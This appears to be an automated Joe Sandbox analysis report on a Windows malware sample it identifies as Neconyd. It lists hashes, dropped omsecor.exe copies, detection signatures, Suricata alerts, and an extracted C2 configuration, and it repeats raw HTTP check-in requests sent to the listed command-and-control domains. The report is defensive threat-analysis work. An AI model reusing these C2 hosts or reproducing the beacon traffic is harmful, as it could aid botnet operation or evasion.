Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bd0wJGTae5.exe

Overview

General Information

Sample name:bd0wJGTae5.exe
renamed because original name is a hash value
Original sample name:497678a9f8adc08d092b720d45797ad245e3d9d7.exe
Analysis ID:1546805
MD5:cc4504807e32f91497d2c5a8dd1061f6
SHA1:497678a9f8adc08d092b720d45797ad245e3d9d7
SHA256:fb7cfd956db9c5dfdf55ddc48bfe2608f40dbbc91965d7791cf19f02fb931289
Tags:exeReversingLabsuser-NDA0E
Infos:

Detection

Neconyd
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Neconyd
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • bd0wJGTae5.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\bd0wJGTae5.exe" MD5: CC4504807E32F91497D2C5A8DD1061F6)
    • omsecor.exe (PID: 6792 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: DC5D106C7C04B52DF85467D6D647221A)
      • omsecor.exe (PID: 6524 cmdline: C:\Windows\System32\omsecor.exe MD5: 1F90E0A8D463721EBCD937EF25C65D05)
        • omsecor.exe (PID: 764 cmdline: C:\Windows\SysWOW64\omsecor.exe /nomove MD5: 1F90E0A8D463721EBCD937EF25C65D05)
  • cleanup
{"C2 url": ["ht:/r.irsf.o/", "http://lousta.net/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "http://mkkuei4kdsz.com/"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: bd0wJGTae5.exe PID: 6712JoeSecurity_NeconydYara detected NeconydJoe Security
    Process Memory Space: omsecor.exe PID: 6792JoeSecurity_NeconydYara detected NeconydJoe Security
      Process Memory Space: omsecor.exe PID: 6524JoeSecurity_NeconydYara detected NeconydJoe Security
        Process Memory Space: omsecor.exe PID: 764JoeSecurity_NeconydYara detected NeconydJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:04:11.505641+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449735TCP
          2024-11-01T16:04:49.791712+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449769TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:04:16.027992+010020169981A Network Trojan was detected192.168.2.449741193.166.255.17180TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:04:07.207285+010020181411A Network Trojan was detected52.34.198.22980192.168.2.449733TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:04:07.207285+010020377711A Network Trojan was detected52.34.198.22980192.168.2.449733TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:03:56.410998+010020157861Malware Command and Control Activity Detected192.168.2.449730193.166.255.17180TCP
          2024-11-01T16:04:05.127285+010020157861Malware Command and Control Activity Detected192.168.2.449731193.166.255.17180TCP
          2024-11-01T16:04:05.885040+010020157861Malware Command and Control Activity Detected192.168.2.44973215.197.204.5680TCP
          2024-11-01T16:04:07.185778+010020157861Malware Command and Control Activity Detected192.168.2.44973352.34.198.22980TCP
          2024-11-01T16:04:15.921297+010020157861Malware Command and Control Activity Detected192.168.2.449734193.166.255.17180TCP
          2024-11-01T16:04:24.544476+010020157861Malware Command and Control Activity Detected192.168.2.449741193.166.255.17180TCP
          2024-11-01T16:04:25.297259+010020157861Malware Command and Control Activity Detected192.168.2.44974215.197.204.5680TCP
          2024-11-01T16:04:26.234709+010020157861Malware Command and Control Activity Detected192.168.2.44974352.34.198.22980TCP
          2024-11-01T16:04:34.852422+010020157861Malware Command and Control Activity Detected192.168.2.449744193.166.255.17180TCP
          2024-11-01T16:04:43.451298+010020157861Malware Command and Control Activity Detected192.168.2.449745193.166.255.17180TCP
          2024-11-01T16:04:43.943414+010020157861Malware Command and Control Activity Detected192.168.2.44974215.197.204.5680TCP
          2024-11-01T16:04:44.887601+010020157861Malware Command and Control Activity Detected192.168.2.44974752.34.198.22980TCP
          2024-11-01T16:04:53.615773+010020157861Malware Command and Control Activity Detected192.168.2.449748193.166.255.17180TCP
          2024-11-01T16:05:02.221231+010020157861Malware Command and Control Activity Detected192.168.2.449798193.166.255.17180TCP
          2024-11-01T16:05:03.027476+010020157861Malware Command and Control Activity Detected192.168.2.44983815.197.204.5680TCP
          2024-11-01T16:05:03.976731+010020157861Malware Command and Control Activity Detected192.168.2.44984452.34.198.22980TCP
          2024-11-01T16:05:12.687295+010020157861Malware Command and Control Activity Detected192.168.2.449851193.166.255.17180TCP
          2024-11-01T16:05:21.282609+010020157861Malware Command and Control Activity Detected192.168.2.449899193.166.255.17180TCP
          2024-11-01T16:05:22.052289+010020157861Malware Command and Control Activity Detected192.168.2.44994515.197.204.5680TCP
          2024-11-01T16:05:23.012530+010020157861Malware Command and Control Activity Detected192.168.2.44995152.34.198.22980TCP
          2024-11-01T16:05:31.722523+010020157861Malware Command and Control Activity Detected192.168.2.449958193.166.255.17180TCP
          2024-11-01T16:05:40.336101+010020157861Malware Command and Control Activity Detected192.168.2.450008193.166.255.17180TCP
          2024-11-01T16:05:41.083381+010020157861Malware Command and Control Activity Detected192.168.2.45002315.197.204.5680TCP
          2024-11-01T16:05:42.038840+010020157861Malware Command and Control Activity Detected192.168.2.45002452.34.198.22980TCP
          2024-11-01T16:05:50.745370+010020157861Malware Command and Control Activity Detected192.168.2.450025193.166.255.17180TCP
          2024-11-01T16:05:59.370566+010020157861Malware Command and Control Activity Detected192.168.2.450026193.166.255.17180TCP
          2024-11-01T16:06:00.210738+010020157861Malware Command and Control Activity Detected192.168.2.45002715.197.204.5680TCP
          2024-11-01T16:06:01.423576+010020157861Malware Command and Control Activity Detected192.168.2.45002852.34.198.22980TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: bd0wJGTae5.exeAvira: detected
          Source: C:\Windows\SysWOW64\omsecor.exeAvira: detection malicious, Label: TR/SpyVoltar.absza
          Source: C:\Users\user\AppData\Roaming\omsecor.exeAvira: detection malicious, Label: TR/SpyVoltar.absza
          Source: bd0wJGTae5.exeMalware Configuration Extractor: Neconyd {"C2 url": ["ht:/r.irsf.o/", "http://lousta.net/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "http://mkkuei4kdsz.com/"]}
          Source: bd0wJGTae5.exeReversingLabs: Detection: 86%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Windows\SysWOW64\omsecor.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\omsecor.exeJoe Sandbox ML: detected
          Source: bd0wJGTae5.exeJoe Sandbox ML: detected
          Source: bd0wJGTae5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040ABD9 FindFirstFileW,FindClose,2_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,2_2_00408248

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49733 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49734 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49743 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49745 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49742 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49747 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49741 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49730 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49732 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49744 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49748 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49731 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49838 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49798 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49844 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49945 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49951 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49851 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49899 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49958 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50024 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50028 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50023 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50027 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50026 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50008 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50025 -> 193.166.255.171:80
          Source: Malware configuration extractorURLs: ht:/r.irsf.o/
          Source: Malware configuration extractorURLs: http://lousta.net/
          Source: Malware configuration extractorURLs: http://ow5dirasuek.com/
          Source: Malware configuration extractorURLs: ht:/w.irsf.o/
          Source: Malware configuration extractorURLs: http://mkkuei4kdsz.com/
          Source: global trafficHTTP traffic detected: GET /875/87.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /740/238.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /516/243.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /546/102.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: ow5dirasuek.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /497/157.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /527/338.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /457/998.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /434/722.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473447|1730473447|0|1|0
          Source: global trafficHTTP traffic detected: GET /78/665.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /956/959.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /781/119.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /945/466.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473466|1730473447|9|2|0
          Source: global trafficHTTP traffic detected: GET /547/467.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /528/262.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /353/421.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /537/167.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473484|1730473447|13|3|0
          Source: global trafficHTTP traffic detected: GET /508/485.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /333/645.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /978/939.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /292/164.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473503|1730473447|16|4|0
          Source: global trafficHTTP traffic detected: GET /263/482.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /908/776.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /785/70.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /763/794.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473522|1730473447|17|5|0
          Source: global trafficHTTP traffic detected: GET /734/112.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /562/252.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /488/933.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /776/947.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473541|1730473447|18|6|0
          Source: Joe Sandbox ViewIP Address: 193.166.255.171 193.166.255.171
          Source: Joe Sandbox ViewIP Address: 52.34.198.229 52.34.198.229
          Source: Joe Sandbox ViewASN Name: FUNETASFI FUNETASFI
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
          Source: Network trafficSuricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.4:49741 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:49733
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:49733
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49735
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49769
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,0_2_00407036
          Source: global trafficHTTP traffic detected: GET /875/87.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /740/238.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /516/243.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /546/102.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: ow5dirasuek.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /497/157.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /527/338.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /457/998.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /434/722.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473447|1730473447|0|1|0
          Source: global trafficHTTP traffic detected: GET /78/665.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /956/959.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /781/119.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /945/466.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473466|1730473447|9|2|0
          Source: global trafficHTTP traffic detected: GET /547/467.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /528/262.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /353/421.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /537/167.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473484|1730473447|13|3|0
          Source: global trafficHTTP traffic detected: GET /508/485.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /333/645.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /978/939.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /292/164.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473503|1730473447|16|4|0
          Source: global trafficHTTP traffic detected: GET /263/482.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /908/776.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /785/70.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /763/794.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473522|1730473447|17|5|0
